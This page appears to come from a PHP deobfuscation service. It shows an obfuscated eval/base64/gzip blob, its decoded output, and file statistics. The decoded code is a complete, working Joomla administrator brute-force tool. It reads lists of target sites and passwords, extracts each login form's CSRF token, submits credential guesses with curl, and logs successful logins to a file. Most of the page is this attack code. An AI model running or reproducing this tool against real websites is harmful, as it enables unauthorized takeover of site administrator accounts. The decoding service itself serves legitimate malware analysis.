Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval("?>".gzuncompress(base64_decode("eJztVd1v2kgQf6/U/2G6QbHRGRsnF10vfLQkgSgtDREf6gMgyzHr..

Decoded Output download

?>b'<? 
@set_time_limit(0); 
# joomla brute Force 
# Coded by Th3 K!LL3r Dz
# Devloped by Th3 K!LL3r Dz

if($_POST[\'x\']){ 

echo "<hr>"; 

$sites = explode("
",file_get_contents($_FILES["sites"]["tmp_name"])); // Get Sites ! 

$w0rds = explode("
",file_get_contents($_FILES["w0rds"]["tmp_name"])); // Get w0rdLiSt ! 

$Attack = new Joomla_brute_Force(); // Active Class 

foreach($w0rds as $pwd){ 

foreach($sites as $site){ 

$Attack->check_it(txt_cln($site),$_POST[\'usr\'],txt_cln($pwd)); // Brute :D 
flush();flush(); 
} 

} 

} 


# Class & Function\'z 

function txt_cln($value){  return str_replace(array("
","
"),"",$value); } 

class Joomla_brute_Force{ 

public function check_it($site,$user,$pass){ // print result 

if(eregi(\'com_config\',$this->post($site,$user,$pass))){ 

echo "<span class=\"x2\"><b># Successful : $user:$pass -> <a href=\'$site/administrator/index.php\'>$site/administrator/index.php</a></b></span><BR>";
$f = fopen("Result.txt","a+"); fwrite($f , "Success > $user:$pass -> $site/administrator/index.php
"); fclose($f); 
flush(); 
}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();} 

} 

public function post($site,$user,$pass){ // Post -> user & pass 

$token = $this->extract_token($site); 

$curl=curl_init(); 

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); 
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); 
curl_setopt($curl,CURLOPT_COOKIEFILE,\'cookie.txt\'); 
curl_setopt($curl,CURLOPT_COOKIEJAR,\'cookie.txt\'); 
curl_setopt($curl,CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4\'); 
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); 
curl_setopt($curl,CURLOPT_POST,1); 
curl_setopt($curl,CURLOPT_POSTFIELDS,\'username=\'.$user.\'&passwd=\'.$pass.\'&lang=en-GB&option=com_login&task=login&\'.$token.\'=1\'); 
curl_setopt($curl,CURLOPT_TIMEOUT,20); 

$exec=curl_exec($curl); 
curl_close($curl); 
return $exec; 

} 

public function extract_token($site){ // get token from source for -> function post 

$source = $this->get_source($site); 

preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token); 

return $token[1][0]; 

} 

public function get_source($site){ // get source for -> function extract_token 

$curl=curl_init(); 
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); 
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); 
curl_setopt($curl,CURLOPT_COOKIEFILE,\'cookie.txt\'); 
curl_setopt($curl,CURLOPT_COOKIEJAR,\'cookie.txt\'); 
curl_setopt($curl,CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4\'); 
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); 
curl_setopt($curl,CURLOPT_TIMEOUT,20); 

$exec=curl_exec($curl); 
curl_close($curl); 
return $exec; 

} 

} 
?>'

Did this file decode correctly?

Original Code

eval("?>".gzuncompress(base64_decode("eJztVd1v2kgQf6/U/2G6QbHRGRsnF10vfLQkgSgtDREf6gMgyzHr4MN4rd11IKn6v9/s2nBJE5L24R5OugeMPbPzm5nffGz9A7x981FQ6cloSb04WkbSrJZrKN2Dvxhbxj5c80xS6DAeUC0+ZTM6g+s7GM4P4fO7bveQw9m90pzR25ilzyrfvolCs+Rd9QbDsbE2puVvoIQ0mDMg9TlvkpoWlEQkqYAG0HUaoyOTTBJihVFMvRuMMmCJpIkUCNW56LYHY6LPk+mYyGXqJf6SkmkZ43ccOKcSBhrtXQ69qvLZr0Dr8zuhlbYbDeQGvSWlHywQPqEr+KSp8zR1nqbOzC1bgYxuKZzGvhDaLmSc+sHcLKLzBZTS1aygZ6vMWVFK9VZoC5eVZjCnwcLDysk15hEn+fmyteE7E9yYWlulws+jOdGlPT5DuDDOxByD3Pyj6Lv28vCpy69D34dOlmAuLDHu81CLT9i6ufXjTIUKnMqMJyAk9zhNYx/J8Dn37/ICkAknZYsQqzCoQe4r0H6eEpnnnmbXcRTA1uuWAp26VcoE5VYpRQiMADNNeZRIjERksYSiHSmnN5FpBGypih9GN4ZVkvNIVJopE88hlR93rUh9dKzCbEzI+mBCmvXr5h4MsiCgQoRZDMegzY+1OVSaUPdhzmnYMDS448+WURIhMb5k3ImSGV3b6Tw1mi+q647frDvX+FMRNOsnfZwebIcQmy/E+UtM0teJ2lgLJNj/jSCr4YojpomnLCBFjND8McAXHWO5FFAQM6GAdJM87BcaCyxPzs4edHwcrdlTDrSLPGjYWD9ssh9Lu6MYuqxXqFOYSo49mW6mqiTZgibIR1FQusZcAtxySlyMR7FwgozHDfXwMGVpFmItwL3IUvStPqzTUb/buxp6/fZw1L8c9luXg067b7naYPdx/LO0P5vsopW8AnHa632+aKulZGGzskVEVWGNn7L61Or/itFo0O63ztuXQ8v4wu6jOPadI7sK5lcMlq1EDUY1KN7hcghHtlsDmlRGgxrw22PXfm+7tntUxgUZLJhzUK2+d1330P0DoBNh37O1c2hX7d9fC6PT63Z7X7u909bwonf5Ksdqy/3Uoc5Fu3s2sAzVLmqhNwxbt5Rt7KvWWc2UQL2hIPaTmwbmdn6yj2DYiA21KGJ2EyX70heLRv6KBrqpbKPhvpbW8OJLuzcaWgfVTfPRNQ3y5lNv+fF/QIpB2wqLRaqtai9MzHPdrscF7znIJyPkbAmCZepSx1tGzdCjgSsu4/zAdozUPZnLHs1QiovUW/oymHt+HJvEkXcpxZ04j2YzmkwIaK4nxBxXK3/6lXD67fDgexnleuOjwp0QR0QErMKjlXNawG/S1rKxOx1Xpy9l/yTIbeo78n1E1+6l8P9K+A+thH9r1NTzQ/NvB6t8YQ=="))); ?>

Function Calls

gzuncompress 1
base64_decode 1

Variables

None

Stats

MD5 47c4878484b0ff6430bc472710e91776
Eval Count 1
Decode Time 72 ms